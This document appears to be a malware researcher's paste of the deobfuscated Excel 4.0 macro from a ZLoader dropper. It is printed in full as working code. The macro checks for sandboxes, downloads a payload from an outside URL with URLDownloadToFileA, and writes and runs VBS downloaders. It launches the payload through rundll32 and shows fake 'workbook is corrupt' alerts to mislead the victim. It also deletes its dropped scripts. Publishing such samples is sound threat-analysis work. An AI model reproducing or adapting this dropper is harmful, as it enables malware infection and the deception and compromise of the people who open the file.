dissectmalware

zloader deobfuscated macro

Jan 26th, 2021
  1. =INT(APP.MAXIMIZE())+124
  2. =INT(GET.WORKSPACE(14)>390)+126
  3. =INT(GET.WORKSPACE(42))+107
  4. =INT(GET.WORKSPACE(19))+96
  5. =INT(GET.WORKSPACE(13)>800)+125
  6. =NOW()
  7. =WAIT(NOW()+"00:00:01")
  8. =NOW()
  9. =INT(($C$119-$C$117)*100000>1)+111
  10. p="C:\Users\Public\Documents\"
  11. n=CHAR(13)
  12. =DEFINE.NAME("ETdTgdE", "={"&$C$112&";"&$C$113&";"&$C$114&";"&$C$115&";"&$C$116&";"&$C$120&"}")
  13. =DEFINE.NAME("mNNthHi",VUTrsT)
  14. =DEFINE.NAME("WUGxMIH",130)
  15. =DEFINE.NAME("xairqY",0)
  16. =DEFINE.NAME("UKVqOBu",0)
  17. =BVKEetMJW()
  18. =HALT()
  19. e="https://amethystwinds.com/k.php"
  20. f="https://amethystwinds.com/k.php"
  21. =IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),,GOTO($C$141))
  22. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,e,p&"nIpymd.txt",0,0)
  23. =IF($C$133<>0,,GOTO($C$136))
  24. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,f,p&"nIpymd.txt",0,0)
  25. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  26. a="ShellExecuteA"
  27. b="C:\Windows\system32\rundll32.exe"
  28. =CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"nIpymd.txt,DllRegisterServer",0,5)
  29. =CLOSE(FALSE)
  30. =FOPEN(p&"imX0rsfm.vbs",3)
  31. =FWRITELN($C$141,"KVgAD = """&e&""""&n&"EerVWB = """&f&"""")
  32. =FWRITELN($C$141,"NAN = Array(KVgAD,EerVWB)")
  33. =FWRITELN($C$141,"Dim LCFn: Set LCFn = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  34. =FWRITELN($C$141,"Function oSIpW(data):"&n&"LCFn.setOption(2) = 13056")
  35. =FWRITELN($C$141,"LCFn.Open ""GET"",data,False")
  36. =FWRITELN($C$141,"LCFn.Send"&n&"oSIpW = LCFn.Status"&n&"End Function"&n&"For Each qn6KPR in NAN")
  37. =FWRITELN($C$141,"If oSIpW(qn6KPR) = 200 Then"&n&"Dim ywQyr: Set ywQyr = CreateObject(""ADODB.Stream"")")
  38. =FWRITELN($C$141,"ywQyr.Open"&n&"ywQyr.Type = 1"&n&"ywQyr.Write LCFn.ResponseBody")
  39. =FWRITELN($C$141,"ywQyr.SaveToFile """&p&"nIpymd.txt"",2"&n&"ywQyr.Close")
  40. =FWRITELN($C$141,"Exit For"&n&"End If"&n&"Next")
  41. =FCLOSE($C$141)
  42. =EXEC("explorer.exe "&p&"imX0rsfm.vbs")
  43. =WHILE(ISERROR(FILES(p&"nIpymd.txt")))
  44. =WAIT(NOW()+"00:00:01")
  45. =NEXT()
  46. =FILE.DELETE(p&"imX0rsfm.vbs")
  47. =WAIT(NOW()+"00:00:02")
  48. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  49. =FOPEN(p&"QRhR.vbs",3)
  50. =FWRITELN($C$160,"Set brdnU0PE = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  51. d="brdnU0PE.Document.Application.ShellExecute ""rundll32.exe"","""
  52. =FWRITELN($C$160,d&p&"nIpymd.txt,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  53. =FCLOSE($C$160)
  54. =WAIT(NOW()+"00:00:01")
  55. =EXEC("explorer.exe "&p&"QRhR.vbs")
  56. =CLOSE(FALSE)
  57.  